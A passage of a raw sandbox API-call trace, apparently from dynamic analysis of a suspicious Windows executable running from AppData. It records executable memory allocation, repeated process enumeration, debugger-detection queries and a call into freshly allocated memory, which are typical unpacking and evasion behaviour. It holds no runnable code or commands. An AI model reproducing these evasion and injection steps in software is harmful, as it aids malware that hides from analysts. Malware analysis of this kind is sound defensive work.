uiAction=0x68, uiParam=0x0, pvParam=0x1da1320, fWinIni=0x0 | out: pvParam=0x1da1320) returned 1 [0207.930] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0207.930] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0207.930] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x20143 [0207.930] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0207.930] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0207.930] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0207.930] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x20141 [0207.930] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x2013f [0207.930] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x2013d [0207.931] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x2013b [0207.931] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x20139 [0207.931] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x20137 [0207.931] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0207.931] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0207.931] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0207.931] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0207.931] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0207.931] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0207.931] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0207.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0207.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0207.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0207.932] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0207.932] GetDC (hWnd=0x0) returned 0x100107b8 [0207.932] GetDeviceCaps (hdc=0x100107b8, index=90) returned 96 [0207.932] ReleaseDC (hWnd=0x0, hDC=0x100107b8) returned 1 [0207.932] GetProcAddress (hModule=0x76890000, lpProcName="EnumDisplayMonitors") returned 0x768b451a [0207.932] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4505a4, dwData=0x1da156c) returned 1 [0207.932] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0207.932] CreateFontIndirectA (lplf=0x18fe97) returned 0xe0a07be [0207.932] GetObjectA (in: h=0xe0a07be, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0207.932] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0207.933] CreateFontIndirectA (lplf=0x18fe1f) returned 0x170a0205 [0207.933] GetObjectA (in: h=0x170a0205, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0207.933] CreateFontIndirectA (lplf=0x18fde3) returned 0x180a0204 [0207.933] GetObjectA (in: h=0x180a0204, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0207.933] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x20135 [0207.935] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0207.936] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned 1 [0207.936] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0207.936] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0207.936] RegisterClassA (lpWndClass=0x46de54) returned 0xc5c123 [0207.936] GetSystemMetrics (nIndex=0) returned 1440 [0207.936] GetSystemMetrics (nIndex=1) returned 900 [0207.936] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="sjfhjjskfsf", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x2013e [0207.940] SetWindowLongA (hWnd=0x2013e, nIndex=-4, dwNewLong=2166767) returned 4219884 [0207.940] SendMessageA (hWnd=0x2013e, Msg=0x80, wParam=0x1, lParam=0x20135) returned 0x0 [0207.941] NtdllDefWindowProc_A (hWnd=0x2013e, Msg=0x80, wParam=0x1, lParam=0x20135) returned 0x0 [0207.953] NtdllDefWindowProc_A (hWnd=0x2013e, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x300fd [0207.954] SetClassLongA (hWnd=0x2013e, nIndex=-14, dwNewLong=131381) returned 0x0 [0207.954] GetSystemMenu (hWnd=0x2013e, bRevert=0) returned 0x20147 [0207.955] DeleteMenu (hMenu=0x20147, uPosition=0xf030, uFlags=0x0) returned 1 [0207.955] DeleteMenu (hMenu=0x20147, uPosition=0xf000, uFlags=0x0) returned 1 [0207.955] DeleteMenu (hMenu=0x20147, uPosition=0xf010, uFlags=0x0) returned 1 [0207.956] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0207.957] GetModuleHandleA (lpModuleName="USER32") returned 0x76890000 [0207.957] GetProcAddress (hModule=0x76890000, lpProcName="AnimateWindow") returned 0x768bb531 [0207.957] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75520000 [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="InitializeFlatSB") returned 0x7555266f [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="UninitializeFlatSB") returned 0x75552542 [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_GetScrollProp") returned 0x75551d29 [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_SetScrollProp") returned 0x7555238d [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_EnableScrollBar") returned 0x755520c9 [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_ShowScrollBar") returned 0x75551fdb [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_GetScrollRange") returned 0x75551e8d [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_GetScrollInfo") returned 0x75551f0f [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_GetScrollPos") returned 0x75551ccd [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_SetScrollPos") returned 0x7555216d [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_SetScrollInfo") returned 0x755522be [0207.958] GetProcAddress (hModule=0x75520000, lpProcName="FlatSB_SetScrollRange") returned 0x755521e2 [0207.958] GetModuleHandleA (lpModuleName="User32.dll") returned 0x76890000 [0207.959] GetProcAddress (hModule=0x76890000, lpProcName="SetLayeredWindowAttributes") returned 0x768cec88 [0207.959] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0207.959] LoadBitmapA (hInstance=0x0, lpBitmapName=0x7ff7) returned 0x11050200 [0207.959] GetObjectA (in: h=0x11050200, c=84, pv=0x18fed0 | out: pv=0x18fed0) returned 24 [0207.959] DeleteObject (ho=0x11050200) returned 1 [0207.959] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc122 [0207.959] DdeInitializeA (in: pidInst=0x1da1ee0, pfnCallback=0x459c74, afCmd=0x0, ulRes=0x0 | out: pidInst=0x1da1ee0) returned 0x0 [0207.960] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe00, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0207.960] DdeCreateStringHandleA (idInst=0x1000080, psz="sjfhjjskfsf", iCodePage=1004) returned 0xc000 [0207.960] DdeNameService (idInst=0x1000080, hsz1=0xc000, hsz2=0x0, afCmd=0x1) returned 0x1 [0207.961] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x46fc24, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0207.961] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0207.961] SelectPalette (hdc=0x0, hPal=0x0, bForceBkgd=0) returned 0x0 [0207.961] GetLastError () returned 0x6 [0207.961] GetLocalTime (in: lpSystemTime=0x46fc04 | out: lpSystemTime=0x46fc04*(wYear=0x7e4, wMonth=0x8, wDayOfWeek=0x2, wDay=0x4, wHour=0x17, wMinute=0x1b, wSecond=0x2c, wMilliseconds=0x186)) [0207.961] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0207.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x46fbfc | out: lpSystemTimeAsFileTime=0x46fbfc*(dwLowDateTime=0xdaf231d0, dwHighDateTime=0x1d66ab6)) [0207.961] FileTimeToSystemTime (in: lpFileTime=0x46fbfc, lpSystemTime=0x46fc14 | out: lpSystemTime=0x46fc14) returned 1 [0207.961] VirtualProtect (in: lpAddress=0x45c361, dwSize=0xfd9d, flNewProtect=0x40, lpflOldProtect=0x18ff24 | out: lpflOldProtect=0x18ff24*=0x20) returned 1 [0207.964] VirtualAlloc (lpAddress=0x0, dwSize=0x31c, flAllocationType=0x3000, flProtect=0x4) returned 0x2e0000 [0207.988] LoadLibraryA (lpLibFileName="shell32") returned 0x75ba0000 [0207.988] LoadLibraryA (lpLibFileName="user32") returned 0x76890000 [0207.989] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2f0000 [0207.989] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f894, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0207.989] VirtualAlloc (lpAddress=0x0, dwSize=0x7fee0, flAllocationType=0x3000, flProtect=0x4) returned 0x370000 [0207.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4 [0207.991] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.992] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0207.992] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0207.993] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.993] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0207.993] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.109] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.110] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.110] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.110] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.111] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.111] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.111] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.112] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.112] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.112] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.112] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.113] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.113] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0208.113] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.114] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.114] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.114] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.114] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.115] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0208.115] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0208.115] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0208.116] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0208.116] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0208.116] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 0 [0208.116] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f644, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0208.116] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f87c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f87c, ReturnLength=0x0) returned 0x0 [0208.117] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f878, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f878, ReturnLength=0x0) returned 0xc0000353 [0208.117] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 2028 18038251" [0208.117] CallWindowProcW (lpPrevWndFunc=0x2f0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x59bbb0 [0208.117] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 2028 18038251", pNumArgs=0x18f87c | out: pNumArgs=0x18f87c) returned 0x59bbb0*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" [0208.118] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0208.119] Process32FirstW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.120] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.120] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.120] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.120] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.121] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.121] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.121] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.122] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.122] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.122] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.122] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.123] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.123] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.123] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.124] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.124] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.124] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.124] Process32NextW (in: hSnapshot=0xe8, 